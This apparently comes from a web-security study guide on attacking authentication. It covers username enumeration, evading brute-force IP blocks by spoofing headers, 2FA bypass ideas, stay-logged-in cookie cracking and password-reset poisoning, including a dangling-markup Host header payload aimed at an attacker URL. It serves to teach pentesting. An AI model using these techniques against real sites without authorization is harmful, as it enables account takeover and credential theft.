Attacking Authentication
Authentication
Authentication is the process of verifying the identity of a user or a client. Websites are exposed to anyone who is connected to the internet this makes robust authentication mechanism integral to effective web security. There are three types of authentication factors something you know(password, security question), something you possess(MFA, 2FA, mobile, authy, duo), someting you are(biometrics).
Authentication vs Authorization
Authentication is the process of verifying that a user is who they claim to be wheares authorization involves verifying whether a user has access, or is allowed to do something or access something.
How does authentication vulnerabilities arise?
Due to weak authentication machanisms because they fail to adquately protect against bruteforce attacks
Due to logic flaws or poor coding allowing authentication mechanisms to be bypassed entirely.
Vulnerabilities in authentication mechanisms
Password based login
Multi Factor Authentication
Other Authentication Mechanisms(forgot password host header attacks, reset link not expire, cookies, session fixation, password change 2fa, etc)
Username Enumeration techniques
First create a list of usernames or emails from website's section, public sources, data dumps, random username wordlists, etc.
Via response, example: if entering an invalid username says invalid username, or says invalid username or password but entering a correct username leads to incorrect password this might be indication that username is valid(example wordpress).
We can enumerate valid usernames by identifying subtle different response for example: if entering incorrect username says "Invalid username or password." and entering valid usernames might give same response "Invalid username or password" but notice there is no full stop character which might indicate this is a valid username we can use burp's grep-extract feature for this.
Username can be enumerated by difference in timing, after finishing the intruder attack select columns on top right and then select response received and response completed options observe the difference in response timing to enumerate a valid username from others.
Usernames can also be enumerated via lockout if continuously bruteforcing with same username wordlists and password one of them gives account locked due to too many login attempts or similar that might be a valid username.
Bruteforce Protection Mechanisms
Locking an account the remote user is trying to access.
Blocking remote user's ip address.
Bypassing Brute force protections - IP Block
We can add X-Forwarded-For, X-Forwarded-Host headers and change the ip address in every request while bruteforcing.
Some websites reset the ip block counter after the attacker(ip owner) has successfully logged in into his own account, eg: attacker's credentials alex@gmail.com alex123 so in username wordlist
password wordlists
Here, alex@gmail.com and alex123 will be tested which will be a success again victim@gmail.com will be tested for password test@330 if it's incorrect again alex@gmail.com and alex123 will be tested which will reset the ip block counter and so on.
If login data is passed via json and we have a valid username we can pass array of multiple passwords like
2FA bypass techniques
Check if a user is already logged in before entering 2FA code by going to /profile, /settings, endpoint directly after login.
If 2fa digit is four digits we can easily bruteforce the code using number wordlists from 0-9999 max and min 4 digits numbers.
Can 2FA be disabled via password reset?
Can 2FA be disabled via email change?
Via response manipulation? (Enter valid code copy the response and enter invalid code then manipulate the response).
Does web application's response leak the code?
Maybe change the status code from 400 to 200 OK?
CSRF on disable 2fa?
Reuse the 2FA? sometimes code doesnot expire at all or the expiration time is an hour upto a day.
Clickjacking on 2FA disable?
Other authentication vulnerabilities
Maybe we are able to dedue how the stay logged in cookie is created and bruteforce the cookie? example if it is created using
base64_encode(username:md5(password))then we can add payload processing rules to first convert all passwords in added wordlists to md5 then add suffixusername:then base64 encode the enire password. Here stay logged in cookie can also be used in place of session cookie meaning we only need stay logged in cookie instead of both session cookie and stay logged in cookie.If password reset url is dynamically generated based upon controllable user input an attaker can input his own host in Host, X-Forwarded-Host, X-Forwarded-For, X-Host header and when the vicim clicks on the link the reset link is sent to attacker's server.
Check for dangling markup in host header like
Host: normal-site.net:'><a href="https://evil-url.net/?anything after ? will be treated as a get parameter and will be included in the request like https://evil-url.net/?please+login+with+thisWe can also bruteforce password via change password functionality. Example when in an authenticated state an application lets a user change his/her password by entering current password, new password and confirming the new password. Imagine a situation where entering an incorrect value for current password and same values for new password and confirm new password results in automatic logout, entering correct value for current password and two different values for new password and confirm new password results "new passwords donot match"
But entering incorrect current_password and two different values for new password and confirm password says "current password is incorrect" analysing this flow we can set bruteforce position for current_password and enter two different values for new password and confirm_new_password and run the attack if current password is found "It will say incorrect new password".
Last updated